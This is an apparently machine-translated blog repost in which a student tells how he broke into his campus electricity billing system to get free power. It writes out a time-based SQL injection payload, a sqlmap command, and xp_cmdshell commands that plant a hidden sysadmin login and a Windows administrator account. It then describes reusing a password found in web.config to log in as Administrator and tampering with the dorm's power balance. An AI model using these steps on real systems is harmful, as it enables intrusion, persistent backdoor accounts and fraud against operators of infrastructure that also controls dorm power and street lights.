In the summer, the electricity bill is expensive. As a student in school, there is no economic source. So I started the idea of the school power system and want to save some electricity. I will introduce how I infiltrated the campus power system. Not much to say directly. 1. Test whether there is an injection point First of all, our school has a site for electricity tariff inquiry to check that there is no whole-site program vulnerability available for this company. The site is aspx. The username and password given by the school are all guests. After entering the bedroom number, you can query. Directly into the box to inject. Enter gues & rsquo; + & rsquo; t password casually lost prompt password error, it is obvious that mssql split injection. Manually tested the next guest; IF SYSTEM_USER='sa' WAITFOR DELAY '00:00:05 There is still a time difference injection, and it is the sa permission, in short, there is injection, directly in the sqlmap run. 2. sqlmap privilege Post injection first capture the package and then sqlmap.py -r s.txt -p TextBox1 --dbs -username -password What got the sa's hash Try to crack but did not crack it, do not want to hash, after all Sa permission. Direct submission; exec master.dbo.sp_addlogin vgy95$, V_gy95; ---; exec master.dbo.sp_addsrvrolemember vgy95, sysadmin; ---; exec master..xp_cmdshell "net user vgy95$ V_gy95 /add"--;exec master ..xp_cmdshell "net localgroup administrators vgy95$ /add"--Fortunately, this server did not set any messy stored procedure restrictions, and all executed successfully. Now there are both sa permissions for sqlserver and remote users with admin privileges. 3. Twisted electricity bill data modification Everyone, I think that this basic is almost over, and then update or insert, but the process is far more difficult than this. First of all, let's take a look at the database: it is obviously elecctldata. After reading the remaining degree, there are still 419.49 degrees (this electricity fee has been changed), search directly in the database "419.49", after the implementation, found that not every table has been checked, found in the Dorm_Room_Info table My bedroom id is 598 and the table of stored electricity charges is executed in the dbo.pos query separator. Use ElecCtlDataselect * from Pos where ID=598 to get the field ElecLeft is the remaining electricity rate, now the electricity fee is 419.49. But there will be two in the database. The difference between the decimal points. Immediately turned over the query page code is how to write, but did not find. I saw a dll in the same directory, immediately thought of the combination of .net and dll, a dll disassembly tool (reflector.exe) found this code: select r.name as room number, cast (p. ElecLeft/100.0 as decimal(20,2)) as 'remaining power (degrees)', p.lastUpdateTime as meter reading time from pos p,dorm_room_info r where p.id = r.posid and r.name='01" Writing the field ElecLeft value divided by 100 is the degree of the query, so there is a gap between the two decimal points. Know the principle of directly constructing the statement: UPDATE Pos SET ElecLeft = 66666 WHERE ID = 598 shows the execution success, excited to check the electricity bill is actually the original value of what situation! ? Actually did not succeed, and then executed one side, still shows success but the original value after the query. Baidu took a look, many people said that this is because the database wrote things, so it rolled back. That is to say, when the database has data update, the transaction will verify the consistency of each operation of the data according to the set statement. If they are inconsistent, the data will be rolled back. My situation seems to be like this. After logging in remotely, I found that I can't use T-sql for debugging, so I opened SQLServerProfiler for database tracking. I saw the ApplicationName written by .Net sqlClient Data Provider. There is an external device that writes data to the database all the time, so my electricity bill can't be changed. Only the Administrator user who tries to log in to the server can see what the situation is, but the password of the Administrator is not. , and fell into a difficult problem. Because the server is windows 2008 r2, the password requirements are more, there must be capitalization and special symbols, so I felt hopeless at the time. I turned over the web.config of the site and saw that the password of the sa user is mjmic****123. So I decided to use this password to try the Administrator user. The result is really logged in! ! ! ! Found a communication program has been writing data to the database, as shown in the figure: it seems that only to stop this program or use the official website of the client to modify, see the desktop power on-line management system shortcuts directly open, operate recharge and modify data, everything Ok! Someone asked me why I didn't run the client for my own user. I also ran it but the user I built didn't have permission to modify it, only allowed to query. Ok, this is the first step in my campus network penetration, the penetration of the power system. The system manages all the bedrooms in our school, including several street lights. The charging fee can also be forced to close or open. It is still very dangerous. It is just summer vacation, and the loophole is submitted. I hope that the packages can learn from each other. This article comes from [System Home] www.xp85.com